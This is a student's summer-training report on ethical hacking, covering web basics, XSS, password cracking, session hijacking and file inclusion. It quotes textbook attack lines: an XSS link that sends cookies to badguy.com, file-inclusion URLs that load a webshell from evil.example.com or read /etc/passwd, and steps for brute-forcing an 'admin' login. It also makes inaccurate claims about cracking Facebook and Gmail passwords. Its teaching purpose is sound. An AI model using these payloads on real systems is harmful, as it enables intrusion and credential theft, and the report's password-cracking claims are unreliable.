Report

SUMMER TRAINING

REPORT

SUBMITTED BY:-

DEVPRIYO RAY

CSE-A, 3RD YEAR (VTH SEMESTER)

REG. NO-1031330059

INTRODUCTION

ANONYMOUS

As for the literal operation of Anonymous, becoming

part of it is as simple as going onto its Internet Relay

Chat forums and typing away.

The real-life people involved in Anonymous could be

behind their laptops anywhere, from an Internet café

in Malaysia to a Michigan suburb.

Anonymous appears to have no spokesperson or

leader.

One could participate for a minute or a day in a chat

room, and then never go back again.

Anonymous is the future form of Internet-based

social activism. They laud the "hactivists" for their

actions.

WHY DO PEOPLE HACK?

To make security stronger ( Ethical Hacking )

Just for fun

Show off

Hack other systems secretly

Notify many people their thought

Steal important information

Destroy enemy’s computer network during the

war

WHAT IS ETHICAL HACKING?

Also Called – Attack & Penetration Testing, White-hat

hacking, Red Teaming;

• It is Legal

• Permission is obtained from the target

• Part of an overall security program

• Identify vulnerabilities visible from the

Internet

Ethical hackers possesses same skills, mindset and

tools of a hacker but the attacks are done in a non-

destructive manner

Hacking

Process of breaking into systems for:

Personal or Commercial Gains

Malicious Intent – Causing severe damage to

Information & Assets

Conforming to accepted professional

standards of conduct

TYPES OF HACKERS

White Hat Hackers:

A White Hat who specializes in penetration testing

and in other testing methodologies to ensure the

security of an organization's information systems.

Black Hat Hackers:

A Black Hat is the villain or bad guy, especially in a

western movie in which such a character would

stereotypically wear a black hat in contrast to the

hero's white hat.

Grey Hat Hackers:

A Grey Hat, in the hacking community, refers to a

skilled hacker whose activities fall somewhere

between white and black hat hackers on a variety of

spectra

Why Can’t We Defend Against Hackers?

There are many unknown unsecure holes in the

system

Hackers need to know only one loophole in the

system

Administrator needs to know all the loopholes to

defend the system

Why Do We Need Ethical Hacking?

TYPES OF ATTACKS

Various kinds of possible attacks on a computer

system are:-

Denial of service attack

Brute force attack

Cross site scripting (XSS)

File inclusions (or file upload), and many more.

WEB BASICS AND SECURITY

WEB APPLICATIONS:

Big trend: software as a (Web-based) service

Online banking, shopping, government, bill

payment, tax prep, customer relationship

management, etc.

Cloud computing

Applications hosted on Web servers

Written in a mixture of PHP, Java, Perl, Python, C,

ASP

Security is rarely the main concern

Poorly written scripts with inadequate input

validation

Sensitive data stored in world-readable files

Recent push from Visa and MasterCard to improve

security of data management (PCI standard)

TYPICAL WEB APPLICATION DESIGN:

A web application is designed keeping in mind the

following things:

Runs on a Web server or application server

Takes input from Web users (via Web server)

Interacts with back-end databases and third parties

Prepares and outputs results for users (via Web

server)

• Dynamically generated HTML pages

• Contain content from many different

sources, often including regular users

– Blogs, social networks, photo-sharing

websites…

BROWSER AND NETWORK:

A browser basically interacts with the network. It

sends a request to the network according to the

need of the user (using the GET method). The reply

concerning the request send is displayed on the

browser (using POST method).

BASIC EXECUTION MODEL OF A BROWSER:

Each browser window or frame:

• Loads content

• Renders

– Processes HTML and scripts to display

the page

– May involve images, subframes, etc.

• Responds to events

Events

• User actions: OnClick, OnMouseover

• Rendering: OnLoad

• Timing: setTimeout(), clearTimeout()

HTML AND SCRIPTS:

EXAMPLE

<html>

…

<p> The script on this page adds two numbers

<script>

var num1, num2, sum

num1 = prompt("Enter first number")

num2 = prompt("Enter second number")

sum = parseInt(num1) + parseInt(num2)

alert("Sum = " + sum)

</script>

…

</html>

EVENT DRIVEN SCRIPT EXECUTION:

EXAMPLE

<script type="text/javascript">

function whichButton(event) {

if (event.button==1) {

alert("You clicked the left mouse button!") }

else {

alert("You clicked the right mouse button!")

}}

</script>

…

<body onmousedown="whichButton(event)">

…

</body>

OUTPUT:

JAVASCRIPT:

Language executed by browser

• Scripts are embedded in Web pages

• Can run before HTML is loaded, before

page is viewed, while it is being viewed or

when leaving the page

Used to implement “active” web pages

• AJAX, huge number of Web-based

applications

Attacker gets to execute code on user’s machine

• Often used to exploit other vulnerabilities

“The world’s most misunderstood programing

language”

JAVASCRIPT IN WEBPAGES:

Embedded in HTML page as <script> element

• JavaScript written directly inside <script>

element

– <script> alert("Hello World!") </script>

• Linked file as src attribute of the <script>

element

<script type="text/JavaScript"

src=“functions.js"></script>

Event handler attribute

<a href="http://www.yahoo.com"

onmouseover="alert('hi');">

Pseudo-URL referenced by a link

<a href=“JavaScript: alert(‘You clicked’);”>Click

me</a>

JAVASCRIPT SECURITY MODEL:

Script runs in a “sandbox”

• No direct file access, restricted network

access

Same-origin policy

• Can only read properties of documents and

windows from the same server, protocol,

and port

• If the same server hosts unrelated sites,

scripts from one site can access document

properties on the other

User can grant privileges to signed scripts

• UniversalBrowserRead/Write,

UniversalFileRead, UniversalSendMail

REMOTE SCRIPTING:

Goal: exchange data between client-side app in a

browser and server-side app (w/o reloading page)

Methods

• Java applet or ActiveX control or Flash

– Can make HTTP requests and interact with client-

side JavaScript code, but requires LiveConnect

(not available on all browsers)

• XML-RPC

– Open, standards-based technology that requires

XML-RPC libraries on your server and in client-

side code

• Simple HTTP via a hidden IFRAME

– IFRAME with a script on your web server (or

database of static HTML files) is by far the easiest

remote scripting option

REMOTE SCRIPTING EXAMPLE:

client.html: pass arguments to server.html

<script type="text/javascript">

function handleResponse() { alert('this function is called from

server.html') }

</script>

<iframe id="RSIFrame" name="RSIFrame"

style="width:0px; height:0px; border: 0px"

src="blank.html">

</iframe>

<a href="server.html" target="RSIFrame">make RPC call</a>

server.html: could be PHP app, anything

<script type="text/javascript">

window.parent.handleResponse()

</script>

CROSS SITE SCRIPTING(XSS)

WHAT IS XSS ?

An XSS vulnerability is present when an attacker can

inject scripting code into pages generated by a web

application.

Methods for injecting malicious code:

Reflected XSS (“type 1”)

the attack script is reflected back to the user as

part of a page from the victim site

Stored XSS (“type 2”)

the attacker stores the malicious code in a

resource managed by the web application, such

as a database

Others, such as DOM-based attacks

XSS EXAMPLE:

search field on victim.com:

http://victim.com/search.php ? term = apple

server-side implementation of search.php:

<HTML> <TITLE> Search Results </TITLE>

<BODY>

Results for <?php echo $_GET[term] ?> (echo search term in response)

. . .

</BODY> </HTML>

Now consider the link

“http://victim.com/search.php ? term =

<script> window.open(

“http://badguy.com?cookie = ” +

document.cookie ) </script>”

What if user clicks on this link?

1. Browser goes to victim.com/search.php

2. Victim.com returns

<HTML> Results for <script> … </script>

1. Browser executes script:

Sends badguy.com cookie for victim.com

OUTPUT:

REFLECTED XSS:

STORED XSS:

CRACKING

Cracking is the procedure of knowing passwords of

certain documents, files, etc. using illegal means.

However, in case of penetration testing, cracking is

not illegal, it is done with the consent of the

required authorities.

Various methods are used to crack passwords like

brute force attack, dictionary attack, social

engineering, etc.

EXAMPLE OF BRUTE FORCE ATTACK USING

FIREFORCE:

Fireforce is an add on used in Mozilla Firefox for

cracking passwords. After installing this add on ,

the following procedure is followed:

Launching the attack:

We want the password for the user ‘admin’.

1) Fill the username section with ‘admin’

2) Right click in the Password field and select:

Fireforce> Generate Password > specify the

type of password.

3) Enter the minimum length

4) Enter the maximum length

5) Enter the text that identifies the failed

authentication

6) Enter the no. request per second

Click on save and the passwords will be generated.

Using a little imagination, all the Facebook passwords can be

cracked, but it largely depends upon the computing power of

the CPU.

However, this method cannot be applied to crack Gmail

passwords. Gmail passwords, however, can be simply cracked

using dictionary attack, which in turn requires a lot of

computing power and is way beyond the scope of a normal PC.

SESSION HIJACKING

Session hijacking, sometimes also known as cookie hijacking is the exploitation of a valid computer session—sometimes also called asession key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer .

A popular method is using source-routed IP packets. This allows an attacker at point B on the network to participate in a conversation between A and C by encouraging the IP packets to pass through B's machine.

If source-routing is turned off, the attacker can use "blind" hijacking, whereby it guesses the responses of the two machines. Thus, the attacker can send a command, but can never see the response. However, a common command would be to set a password allowing access from somewhere else on the net.

METHODS OF SESSION HIJACKING:

Session fixation, where the attacker sets a user's session id to one known to him, for example by sending the user an email with a link that contains a particular session id. The attacker now only has to wait until the user logs in.

Session sidejacking, where the attacker uses packet sniffing to read network traffic between two parties to steal the session cookie. Many web sites use SSLencryption for login pages to prevent attackers from seeing the password, but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic to intercept all the data that is submitted to the server or web pages viewed by the client. Since this data includes the session cookie, it allows him to impersonate the victim, even if the password itself is not compromised. Unsecured Wi-Fi hotspots are particularly vulnerable, as anyone sharing the network will generally be able to read most of the web traffic between other nodes and the access point.

Cross-site scripting, where the attacker tricks the user's computer into running code which is treated as trustworthy because it appears to belong to the server, allowing the attacker to obtain a copy of the cookie or perform other operations.

Malware and unwanted programs can use browser hijacking to steal a browser's cookie files without a user's knowledge, and then perform actions (like installing Android apps) without the user's knowledge. An attacker with physical access can simply attempt to steal the session key by, for example, obtaining the file or memory contents of the appropriate part of either the user's computer or the server.

FILE INCLUSION

File inclusion vulnerability is a type of vulnerability most often found on websites. It allows an attacker to include a file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file or more serious events such as:

Code execution on the web server

Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS)

Denial of service (DoS)

Data theft/manipulation

TYPES OF INCLUSION:

1) REMOTE FILE INCLUSION 2) LOCAL FILE INCLUSION

EXAMPLE: Consider this PHP script which includes a file specified by request:

<?php

if ( isset( $_GET['COLOR'] ) ) {

include( $_GET['COLOR'] . '.php' );

}

?>

<form method="get">

<select name="COLOR">

<option value="red">red</option>

<option value="blue">blue</option>

</select>

<input type="submit">

</form>

The developer intended only blue.php and red.php to be used as options. But it is possible to inject code from other files as anyone can insert arbitrary values

for the COLOR parameter.

/vulnerable.php?COLOR=http://evil.example.co

m/webshell.txt? - injects a remotely hosted file

containing a malicious code.

/vulnerable.php?COLOR=C:\\ftp\\upload\\expl

oit - Executes code from an already uploaded file

called exploit.php (local file inclusion vulnerability)

/vulnerable.php?COLOR=C:\\notes.txt%00 -

example using NULL meta character to remove

the .php suffix, allowing access to files other

than .php. (Enabling magic_quotes_gpc limits the attack by escaping special characters, thus disabling the use of the NUL terminator)

/vulnerable.php?COLOR=/etc/passwd%00 -

allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.